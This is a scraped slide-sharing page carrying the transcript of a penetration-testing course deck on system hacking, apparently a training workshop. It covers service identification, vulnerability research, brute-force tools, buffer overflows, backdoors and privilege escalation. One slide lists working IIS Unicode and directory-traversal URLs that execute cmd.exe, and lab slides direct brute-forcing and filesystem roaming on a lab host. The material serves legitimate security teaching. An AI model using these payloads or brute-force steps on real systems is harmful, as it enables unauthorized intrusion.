system hacking n.
Download
Skip this Video
Loading SlideShow in 5 Seconds..
System Hacking PowerPoint Presentation
Download Presentation
System Hacking

Loading in 2 Seconds...

play fullscreen
1 / 101

System Hacking - PowerPoint PPT Presentation


  • 261 Views
  • Uploaded on

System Hacking. Section 4. Outline. Service identification Vulnerability identification and research Exploits Putting it all together Target selection in large networks Using automated tools. Service Identification. Section 4.1. Service Identification. Common ports Banners

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

System Hacking


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
    Presentation Transcript
    1. System Hacking Section 4

    2. Outline • Service identification • Vulnerability identification and research • Exploits • Putting it all together • Target selection in large networks • Using automated tools

    3. Service Identification Section 4.1

    4. Service Identification • Common ports • Banners • Fingerprinting

    5. Connecting to ports • Telnet or netcat is the best way to connect to ports • Many services may be accessed directly

    6. Common ports Many services can be identified by their common port numbers

    7. Zone-h.org

    8. Alldas.de

    9. Banners Some services may be better identified by banners: • telnet on routers (2001, 4001, 6001) • Web daemons for applications • Compaq Insight Manager • Many systems include web configuration interfaces

    10. Banners

    11. Fingerprinting Some services cannot be clearly identified just by connecting the them: • Netbus on NT uses the same port as an RPC service on Solaris • Some database connections do not provide automatic response Fingerprinting a service may identify what it is, even if it has moved ports

    12. Fingerprinting

    13. Vulnerability Research Section 4.2

    14. Vulnerability identification and research • This is the process of mapping identified security attributes of a system or application to potential vulnerabilities Several methods to map vulnerabilities: • Manually map identified systems against publicly available database such as www.securityfocus.com, www.cert.org and vendor security alerts • Use public exploit code posted to various security mailing lists, hacker websites or write your own code • Use automated vulnerability scanning tools such as Nessus, ISS or whisker

    15. Vulnerability research

    16. Lab • Explore the following security sites to identify what vulnerability information would be of use to you for the services you have identified. • www.securityfocus.com • General searches on google.com • www.packetstormsecurity.com • www.astalavista.box.sk • www.securiteam.com Time: 30 minutes

    17. Exploits Section 4.3

    18. Types of exploits • Remote exploits • Trojans • Privilege escalation

    19. Remote Exploits Section 4.3.1

    20. Remote exploits A ‘remote exploit’ attempts to gain access across the network and without proper authentication. Examples: • Brute force authentication attempts • Attacks bypassing integrity checkers • Buffer overflows • Sniffing (to some extent)

    21. Brute force attacks Most common services attacked • Telnet • FTP • “R” commands • Secure Shell • SNMP community names • Post Office Protocol (POP) • HyperText Transport Protocol (HTTP/HTTPS) • SMB

    22. Common Tools used • Brutus • Admsnmp • Admsmb • TeeNet • Pwscan.pl • Thc_hydra

    23. Remote password guessing • Attempting to connect to an enumerated share such as (ADMIN$ and C$) and trying username/password combinations until one works • A “null session” can be established with the target to obtain valid account names • Use an automated password guessing tool to brute force the selected shares.

    24. Brute force attacks under Windows • Some common services prone to brute-force: • Web • Netbios • FTP

    25. Legion

    26. Brute force attacks under Unix • Some common services prone to brute-force: • telnet • Ssh • Web • FTP • R-commands

    27. Lab • Use a Netbios scanning tool to identify local shares on this network • Use brute force tool to attempt access to an account on 10.0.1.120 • Warning! These tools can produce significant traffic and lock accounts. Time: 30 minutes

    28. Buffer overflow attacks FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from LOUD-FAT-BLOKE • Stack overflows • Format string overflows • Heap overflows • Overflow subverting the control path

    29. Buffer overflow attacks FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from LOUD-FAT-BLOKE

    30. Buffer overflow attacks FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from LOUD-FAT-BLOKE • Occurs when a user or process attempts to place more data into a buffer than was originally allocated • Commonly associated with C functions like strcpy(), strcat(), sprintf() and etc • Most frequently found when user input is taken and passed into an application

    31. Windows buffer overflows • Only a few conditions have been revealed to date • All of them exploited flaws in application programs • Very common for DoS attacks Exploits • Netmeeting 2.x by Cult of the Dead Cow • NT RAS by Cerberus Information Security • Winhlp32 by Cerberus Information Security • IISHack by eEye • Oracle Web Listener 4.0 by CIS • Outlook GMT token overrun by Underground Security Systems Research • IIS .printer

    32. Unix buffer overflows • Sadmind • ftp • Ssh • nfs

    33. Unexpected input • Bypassing integrity checks • Gaining access by providing unexpected input • IIS unicode • Web applications

    34. Format string attacks • Caused by programming errors in the formatted output family of functions, which includes printf() and sprintf() • Efforts usually focused on SUID root programs

    35. Input validation attacks • Occurs when a program fails to recognise syntactically incorrect input • Occurs when a module accepts extraneous input • Occurs when a module fails to handle missing input fields • A field-value correlation error occurs • Common in web applications

    36. IIS vulnerabilities • Unicode and URL based attacks • Special tags in HTTP • Sample scripts to brute force

    37. IIS hacking • /scripts/root.exe?/c+dir • /MSADC/root.exe?/c+dir • /c/winnt/system32/cmd.exe?/c+dir • /d/winnt/system32/cmd.exe?/c+dir • /scripts/..%255c../winnt/system32/cmd.exe?/c+dir • /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir • /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir • /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir • /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir • /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir • /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir • /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir • /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir • /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir • /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir • /scripts/..%252f../winnt/system32/cmd.exe?/c+dir

    38. Lab • Use the provided URLs to roam the filesystem of 10.0.1.120 • What is accessible and what is not? Time: 10 minutes

    39. Trojan Horses and Backdoors Section 4.3.2

    40. Windows trojans and backdoors These programs provide unauthorised access to a system without the user’s knowledge: • Theef • CDC BackOrifice • SubSeven • Moosucker A great site: http://www.tlsecurity.net

    41. Tlsecurity.net

    42. Privilege Escalation Section 4.3.3

    43. Privilege escalation • Attack used to move from normal user to superuser • Quest for Administrator • Quest for root

    44. Quest for Administrator • Hoovering information • Getadmin • Sechole • Spoofing LPC Port requests

    45. Hoovering information • Identify further information that will gain higher privileges • Srvinfo • Find utility • regdmp

    46. Getadmin • Windows NT 4 • Small program written by Konstantin Sobolev • Adds users to the local admin group • Hijacks a process called winlogon • Patched by NT SP3

    47. Sechole • Similar functionality to getadmin • Modifies instructions in the memory of the OpenProcess API • Possible to launch remotely if IIS is running • Patched by NT SP6a

    48. Spoofing LPC Port Requests • Vulnerability identified by The RAZOR Team at http://razor.bindview.com • The code takes advantage of a flaw in one function of the Local Procedure Call (LPC) Ports API

    49. Quest for root • Local buffer overflow • Symlink • File Descriptor attacks • Signal handling • Core-file manipulation • Shared libraries • Kernel flaws • System misconfiguration • IFS attacks